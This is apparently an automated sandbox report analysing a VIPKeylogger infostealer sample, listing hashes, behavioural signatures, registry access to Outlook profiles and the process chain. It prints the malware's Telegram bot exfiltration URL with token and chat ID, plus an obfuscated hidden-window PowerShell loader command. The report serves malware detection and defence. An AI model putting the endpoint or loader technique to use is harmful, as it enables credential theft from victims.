Analysis
-
max time kernel
141s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 03:05
Static task
static1
Behavioral task
behavioral1
Sample
d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
Resource
win10v2004-20241007-en
General
-
Target
d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe
-
Size
560KB
-
MD5
376eba8de3fb318ec11efa037f8c0999
-
SHA1
998079a01ea4b5af7d90b44e289ff3e61caaa6c2
-
SHA256
d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b
-
SHA512
1113f67e131f0dc952f8168be4274f910e942992b6775daaa241f48e1852ceb10875d609d34fed41ac2b5ba845d34adf327a99eaa52a7be3dbf054876aae7496
-
SSDEEP
6144:14t6Ls60mub8lmN1d/VJjbGTaQ8jY7dsO9sKL/urW09nSl6Mkmt4XzVkpmAZ51Mg:1kuicyCdsYsKLktnS5oVMmySMpQK7
Malware Config
Extracted
vipkeylogger
https://api.telegram.org/bot7689901861:AAEBNHwgb6W6VOFJWVPXuo-RFbpacsgCwQg/sendMessage?chat_id=7582232587
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 24 2808 msiexec.exe 26 2808 msiexec.exe 28 2808 msiexec.exe 30 2808 msiexec.exe 32 2808 msiexec.exe 47 2808 msiexec.exe 49 2808 msiexec.exe 53 2808 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2808 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 432 powershell.exe 2808 msiexec.exe -
pid Process 432 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 432 powershell.exe 2808 msiexec.exe 2808 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 432 powershell.exe Token: SeIncreaseQuotaPrivilege 432 powershell.exe Token: SeSecurityPrivilege 432 powershell.exe Token: SeTakeOwnershipPrivilege 432 powershell.exe Token: SeLoadDriverPrivilege 432 powershell.exe Token: SeSystemProfilePrivilege 432 powershell.exe Token: SeSystemtimePrivilege 432 powershell.exe Token: SeProfSingleProcessPrivilege 432 powershell.exe Token: SeIncBasePriorityPrivilege 432 powershell.exe Token: SeCreatePagefilePrivilege 432 powershell.exe Token: SeBackupPrivilege 432 powershell.exe Token: SeRestorePrivilege 432 powershell.exe Token: SeShutdownPrivilege 432 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeSystemEnvironmentPrivilege 432 powershell.exe Token: SeRemoteShutdownPrivilege 432 powershell.exe Token: SeUndockPrivilege 432 powershell.exe Token: SeManageVolumePrivilege 432 powershell.exe Token: 33 432 powershell.exe Token: 34 432 powershell.exe Token: 35 432 powershell.exe Token: 36 432 powershell.exe Token: SeDebugPrivilege 2808 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3312 wrote to memory of 432 3312 d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe 82 PID 3312 wrote to memory of 432 3312 d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe 82 PID 3312 wrote to memory of 432 3312 d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe 82 PID 432 wrote to memory of 2808 432 powershell.exe 91 PID 432 wrote to memory of 2808 432 powershell.exe 91 PID 432 wrote to memory of 2808 432 powershell.exe 91 PID 432 wrote to memory of 2808 432 powershell.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe"C:\Users\Admin\AppData\Local\Temp\d6b544f7fe973a0ec18dc6994869bbd97779b965a7bc999b11f1d590cff9707b.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle minimized "$Underborer=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\Lysstraales\Genoversat\lirens\Prvelser.Lac';$succederer=$Underborer.SubString(68121,3);.$succederer($Underborer)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2808
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
66KB
MD52fdb2387b2ec76ba38cf0b98ff9b385a
SHA1159f150b31e4282ad50fee6b9cf2198bc7e6434b
SHA256fbf49a93c4f39e1b67a8b995df62cdb2ab62bc8508246442613c6dd57ccb070f
SHA512f5461b96e7c6b647c371c91fc7049f62565239c57105c91833faf6e23073f06206ffa4a0d79e584ed8e080d0f985126863c354f42c4f82c4d7b756ffca583c76
-
Filesize
313KB
MD52aedacd2d5f1723295bd050493254f2e
SHA108922a972106ebc10443b2353004317f67a408cb
SHA2568c95496e75cc10a476add694057c11ec66b5cebe03cf7a67e996e014487566d4
SHA512cb3c4a856d3b10dcfdc6437b2f67811da95e7668ad6c59598ef838b439ebfa35ecb3f9599eb46f99124b2700a54a4d66503ffad3517f168ecca7eecd6ad40a5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82